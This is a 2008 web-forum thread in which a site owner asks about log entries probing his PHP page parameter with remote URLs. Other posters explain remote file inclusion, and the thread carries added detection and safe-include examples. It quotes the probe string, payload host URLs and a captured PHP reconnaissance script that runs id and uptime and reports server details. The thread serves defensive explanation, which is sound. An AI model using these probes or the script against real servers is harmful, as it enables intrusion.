Is someone trying to hack my web site?


SomePerson
13 Jul 2008, 09:01
I've been getting a lot of hits recently on my web site to pages which don't exist like ht*p://brian.kentosh.com/index.php?pg=ht*p://210.115.243.30/x.txt?? (my asterisks) and I don't really get what's up or what they're trying to accomplish... I don't know if people are trying to hack the page or what. 'pg' is just a variable I use in a switch case to determine what content to display - I don't see how anyone could think to accomplish anything by putting web addresses in there.

They occur with distinct IP addresses, not as an IP address that viewed any other pages. They usually come in pairs, with two different web addresses per IP, although there were a couple with only one. The "Agent" field, where it tells me browser information, says a few times 'DataCha0s/2.0' but usually 'libwww-perl/5.805'. I looked up the DataCha0s one and found several references that it's a hacker bot located in Brazil or something. There's mention of the same kind of deal I have with libwww-perl/5.xxx at http://www.ivorde.ro/libwwwperl5805_User_agent_bot_visited_my_website-28.html

I don't really know what to make of it - it seems entirely random. Again, pg is only used as the argument of a switch case, so I have nothing to worry about, right? And if it is a hacking script/bot/thing, why on earth would it target my site which has no user accounts, no credit cards or anything of the sort... :-/
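The log pattern described in the post (a URL stuffed into a page parameter, sent by libwww-perl or DataCha0s agents) can be picked out of an access log automatically. This is an added example, not code from the thread; it assumes Apache combined log format, and the sample lines are constructed.

```php
<?php
// Added example (not code from the thread): flag remote-file-inclusion probes
// like the ones described above in Apache combined-format access log lines.
// Two signals: a query parameter whose value is itself a URL, and the user
// agents of the automated scanners mentioned in the post. Sample lines are constructed.

const SCANNER_AGENTS = ['libwww-perl', 'DataCha0s'];

// Returns the reasons a line looks like an RFI probe; an empty array means clean.
function inspect_log_line(string $line): array
{
    // host ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return ['unparseable line'];
    }
    [, $ip, $target, $agent] = $m;
    $reasons = [];

    // Signal 1: take everything after the first "?" as the query string and let
    // parse_str() URL-decode it, so %3A%2F%2F is seen as "://" too.
    $q = strpos($target, '?');
    parse_str($q === false ? '' : substr($target, $q + 1), $params);
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^(https?|ftp|php|data)://#i', $value)) {
            $reasons[] = "$ip: parameter '$name' carries a URL ($value)";
        }
    }

    // Signal 2: user agents the thread associates with automated RFI scanners.
    foreach (SCANNER_AGENTS as $ua) {
        if (stripos($agent, $ua) !== false) {
            $reasons[] = "$ip: scanner user agent '$agent'";
        }
    }
    return $reasons;
}

// Constructed sample lines: one probe with a URL-encoded payload, one clean hit.
$lines = [
    '203.0.113.7 - - [13/Jul/2008:08:55:01 -0400] "GET /index.php?pg=http%3A%2F%2F210.115.243.30%2Fx.txt%3F%3F HTTP/1.1" 200 4120 "-" "libwww-perl/5.805"',
    '198.51.100.2 - - [13/Jul/2008:08:56:12 -0400] "GET /index.php?pg=news HTTP/1.1" 200 6230 "-" "Mozilla/5.0 (X11; Linux i686)"',
];
foreach ($lines as $line) {
    $hits = inspect_log_line($line);
    echo $hits ? implode(PHP_EOL, $hits) : 'clean', PHP_EOL;
}
```

The first sample line is reported twice (URL-valued parameter and scanner agent); the second prints `clean`.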

SupSuper
13 Jul 2008, 14:10
They're trying to hack your website, or more to the point, exploit a common security hole. They saw the way your page is designed and immediately tried the most common trick. Just because your page isn't serious business doesn't mean it's not exploitable.

When you make a website you usually have common elements that go on every page, like menus and logos. But of course you don't want to copy+paste it over every page, that's silly, so the first thought is to set up an index.php with all the common elements that loads within whatever xxx page you want to display, passed as index.php?page=xxx. Problem solved!

But most people are lazy and just do a include(xxx) without any checking, which instantly lets anyone pass whatever script they want into the site and cause havoc, which is what they're trying to do in your case. Luckily you've got that secured, but you might wanna look for any other security holes now that you got some hacker's attention. :p
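The two designs SupSuper contrasts, side by side, as an added example (not code from the thread or from the OP's site); the page names and file paths are hypothetical.

```php
<?php
// Added example, not code from this thread or from the OP's site: the unsafe
// include() pattern SupSuper describes next to an allowlist version. The page
// names and file paths are hypothetical.

// UNSAFE: the request parameter becomes the include path unmodified. With
// remote includes enabled (allow_url_fopen on PHP < 5.2, allow_url_include
// since), ?page=http://host/x.txt?? fetches and executes x.txt; the trailing
// "?" turns any suffix the script appends (here ".php") into a query string.
// Even with remote includes off, "../" lets a caller include local files.
function render_unsafe(array $get): void
{
    include $get['page'] . '.php';
}

// SAFE: the parameter selects a key in a fixed map; the filename itself never
// comes from the request. The OP's switch statement is this same idea.
const PAGES = [
    ''      => 'pages/home.php',
    'news'  => 'pages/news.php',
    'about' => 'pages/about.php',
];

function resolve_page(array $get): string
{
    $key = $get['pg'] ?? '';
    // Anything that is not exactly a known key (URLs, paths, arrays such as
    // pg[]=x, unknown strings) gets the not-found page.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return 'pages/404.php';
    }
    return PAGES[$key];
}

function render_safe(array $get): void
{
    include __DIR__ . '/' . resolve_page($get);
}

// Constructed requests: a normal page, the probe seen in the thread, and no pg at all.
foreach ([['pg' => 'news'], ['pg' => 'http://210.115.243.30/x.txt??'], []] as $req) {
    echo json_encode($req), ' -> ', resolve_page($req), PHP_EOL;
}
```

Only resolve_page() is exercised by the loop, so running this does not include any file; the probe request resolves to `pages/404.php`.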

M3ntal
13 Jul 2008, 14:55
You're fine, I just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txt

I'll try a few more variations and let you know if I find anything; anything in your logs from 87.194.xxx.xx will be me.

Edit: Nope, seems fine.

SupSuper
13 Jul 2008, 17:00
You're fine, I just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txt

Fun link. :p
http://img134.imageshack.us/img134/5554/holyvirushw8.png

SomePerson
13 Jul 2008, 21:39
You're fine, I just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txt

I'll try a few more variations and let you know if I find anything; anything in your logs from 87.194.xxx.xx will be me.

Edit: Nope, seems fine.

Wow, that link looks like a load of gibberish to me. O.o I'm glad it didn't seem to do its job... I've also received numerous attempts to run scripts like this:


<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "netcat<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "netcat<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


This is one I think I can understand - it seems they're trying to obtain and display information about my server? Even if they got this information, what could they do with it?

They're trying to hack your website, or more to the point, exploit a common security hole. They saw the way your page is designed and immediately tried the most common trick. Just because your page isn't serious business doesn't mean it's not exploitable.

When you make a website you usually have common elements that go on every page, like menus and logos. But of course you don't want to copy+paste it over every page, that's silly, so the first thought is to set up an index.php with all the common elements that loads within whatever xxx page you want to display, passed as index.php?page=xxx. Problem solved!

But most people are lazy and just do a include(xxx) without any checking, which instantly lets anyone pass whatever script they want into the site and cause havoc, which is what they're trying to do in your case. Luckily you've got that secured, but you might wanna look for any other security holes now that you got some hacker's attention. :p

Oh, that makes sense sorta. I never knew about the include(xxx) function so I just set up my page with the one thing I knew how to do in php... :o


<?php
switch ($_GET['pg']) {

    case null:
        $media = 'N/A';
        $title = 'Home';
        $content = '<p>Welcome to the semi-updated page of Brian Kentosh\'s projects. The site is, and has been, undergoing renovations for quite some time. Please check back every now and then for updates.</p>';
        break;

    case 'news':
        $media = 'N/A';
        $title = 'News';
        $content = '<p>Jun. 24, 2008 - I finally moved the work-in-progress page to the main page, even though it\'s not done yet, and I still intend to put plans and progress shots up for all my creations, so be sure to check back occasionally, although I admit it may be a while. I also need to rewrite a lot of the descriptions because I was younger when I wrote most of them, and looking back on them they\'re a bit embarrassing. I\'m hoping to have all this done by the end of summer. Progress shots are now available for the Electric Balalaika as that seems to be by far the most popular of my creations.</p>';
        break;

etc. (the switch case goes on) I assume they can't really use that to run their scripts... Other than that the only other php code is a few echo commands.


Actually, looking back through my logs I see more of the script I posted above, but then one instance of another evil one at http://www.geocities.com/sofiawila/test.txt . The only thing I get out of it is the words Windows and Safe Mode; I'm not sure if they're trying to mess with the server or something, but the server is running Linux for all it's worth.

AndrewTaylor
13 Jul 2008, 22:38
I've had people do this to me, too.

M3ntal
14 Jul 2008, 16:00
Fun link. :p

Lol, it's harmless as a .txt file; your antivirus correctly picked it up as a PHP exploit, so don't install a web server with PHP on your PC, rename that .txt to a .php, and run it.
Oh, that makes sense sorta. I never knew about the include(xxx) function so I just set up my page with the one thing I knew how to do in php... :o


<?php
switch ($_GET['pg']) {

    case null:
        $media = 'N/A';
        $title = 'Home';
        $content = '<p>Welcome to the semi-updated page of Brian Kentosh\'s projects. The site is, and has been, undergoing renovations for quite some time. Please check back every now and then for updates.</p>';
        break;

    case 'news':
        $media = 'N/A';
        $title = 'News';
        $content = '<p>Jun. 24, 2008 - I finally moved the work-in-progress page to the main page, even though it\'s not done yet, and I still intend to put plans and progress shots up for all my creations, so be sure to check back occasionally, although I admit it may be a while. I also need to rewrite a lot of the descriptions because I was younger when I wrote most of them, and looking back on them they\'re a bit embarrassing. I\'m hoping to have all this done by the end of summer. Progress shots are now available for the Electric Balalaika as that seems to be by far the most popular of my creations.</p>';
        break;

etc. (the switch case goes on) I assume they can't really use that to run their scripts... Other than that the only other php code is a few echo commands.
Your code is fine.

Slick
14 Jul 2008, 21:48
Crap, He's On To Me!



...WHY DID I POST THIS?!